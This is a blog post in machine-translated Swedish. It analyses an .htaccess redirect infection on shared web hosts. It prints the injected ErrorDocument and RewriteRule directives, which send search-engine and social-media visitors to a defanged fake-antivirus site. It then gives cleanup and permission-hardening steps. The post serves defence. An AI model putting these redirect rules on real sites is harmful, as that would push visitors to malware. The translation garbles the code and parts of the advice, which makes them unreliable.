Malware / virus - .htaccess "skriva" och omdirigera

En ny form av virus som jag inte vet så mycket påverkar platser finns på otillförlitliga servrar där användarnas konton / underkonton kan "se" varandra. Mer specifikt är alla hosting konton lägger i mappen "vhosts"Skriva och rätten till användarmapp de "vhosts" ges en allmän användare ... återförsäljare i de flesta situationer. Det är en typisk webbservrar som inte använder WHM / cPanel.

Verkan av viruset Htaccess -.. Htaccess Hack

Virus påverkar filer .htaccess Site av offret. De tillade linjer / Direktiven till omdirigera besökare (Kommer från Yahoo, MSN, Google, Facebook, yaindex, twitter, myspace, etc webbplatser och portaler med hög trafik) av vissa webbplatser som erbjuder "antivirus. "Det är falska antivirusprogram, Som jag skrev i inledningen till .

Här är vad det ser ut som en .htaccess påverkas: (inte komma åt innehåll URL: er raderna nedan)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * * $ [NC, OR] Google.
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Linkedin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Livejasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Doubleclick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * * $ [NC, OR] Wordpress.
RewriteCond% {HTTP_REFERER}. * * $ [NC, OR] Yahoo.
RewriteCond% {HTTP_REFERER}. * Fråga. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Gå. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Sök. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows. *
RewriteRule. * hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R-L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond% {REQUEST_FILENAME} * Jpg $ |!.. * Gif $ |. * PNG $
RewriteCond% {HTTP_USER_AGENT}. * Windows. *
RewriteRule. * hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R-L]

Användare av Wordpress kommer att hitta dessa rader i filen .htaccess från public_html. Dessutom skapar en. Htaccess i samma mapp viruset wp-innehåll.

*Det finns situationer där istället visas peoriavascularsurgery.com dns.thesoulfoodcafe.com eller andra adresser.

Vad som gör detta virus.

När omdirigeras besökaren möts med öppna armar av meddelandet:

Varning!
Datorn innehåller olika tecken på virus och malware närvaro program. Systemet kräver omedelbara anti virus check!
Security System kommer att utföra en snabb och gratis scanning av din dator efter virus och skadliga program.

1 malware

Oavsett vilken knapp du trycker på, är vi till sidan "Min dator"Skapad för att efterlikna konstruktion XP. Detta startar automatiskt "scanning" i slutet av där finner vi att vi är "smittade".

2 malware

När du klickar på OK eller Avbryt, kommer den att starta ladda nerFilens setup.exe. Detta setup.exe är falska anti-virus påverkar systemet. Det kommer att installera en serie av skadlig kod som sprider virus ytterligare länkar, och förutom de en antivirusprogram (Allt falskt) att offret uppmanas att köpa.
De som redan har kontaktat denna form av virus kan använda . Det rekommenderas också att skanna hela hårddisken. Rekommenderat Kaspersky Internet Security eller Kaspersky Anti-Virus.

Denna typ av virus drabbar Visitor OS-operativsystem Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 och Windows 95. Hittills har inga fall av smitta av operativsystemen Windows Vista och Windows 7.

Hur kan vi eliminera detta virus. Htaccess-fil på servern, och hur man kan förebygga infektion.

1. Analysera misstänkta filer och radera koder. För att säkerställa att inte bara påverkat fil .htaccess är bättre analysera alla filer . Php si . Js.

2. Skriva om filen. Htaccess och det in den chmod 644 eller 744 med skrivrättigheter endast brukaren ägare.

3. När du skapar ett webbhotell för en webbplats mapp / Home eller / Webroot Detta kommer automatiskt att skapa en mapp som ofta har användarens namn (användaren att cPanel, ftp, Etc). För att undvika att skriva data och överföring av virus från en användare till en annan, rekommenderas att varje användare mapp som ska ställas in:

chmod eller 644 744, 755 - visas är 644.
chown-R nume_user nume_folder.
chgrp-R nume_user nume_folder

ls-all för att kontrollera om de lägena gjordes på rätt sätt. Ska visas något liknande:

drwx-x-x 12 Dinamics Dinamics maj 4096 6 14: 51 Dinamics /
drwx-x-x 10 4096 Duran Duran mars 7 07: 46 duran /
drwx-x-x 12 rören rören 4096 jan 29 11: 23 rör /
drwxr-xr-x 14 4096 februari 26 2009 Express Express Express /
drwxr-xr-x 9 EZO EZO maj 4096 19 01: 09 EZO /
drwx-x-x pharma pharma 9 4096 December 19 22: 29 pharma /

Om något av ovanstående kommer userele FTP Infekterade filerDet kan inte skicka viruset till en annan användare värd. Det är ett minimi skyddsnät för att skydda konton lagras på en webbserver.

Gemensamma delar av de områden som drabbats av denna typ av virus.

Alla områden som berörs omdirigera besökare till webbplatser med domännamn som innehåller "/".

Denna "virus. htaccess"Påverkar alla CMS (Joomla, Wordpress, phpBBEtc.) som använder .htaccess.

. Htaccess Redirect Virus Hack &.

Malware / virus - .htaccess "skriva" och omdirigera

Om författaren

stealth LP

Grundare och redaktör stealth SettingsI 2006 datum.
Erfarenhet på Linux-operativsystem (särskilt CentOS), Mac OS X, Windows XP> Windows 10 och Wordpress (CMS).

Lämna en kommentar

Den här sidan använder Akismet för att minska spam. Läs om hur din kommentardata behandlas.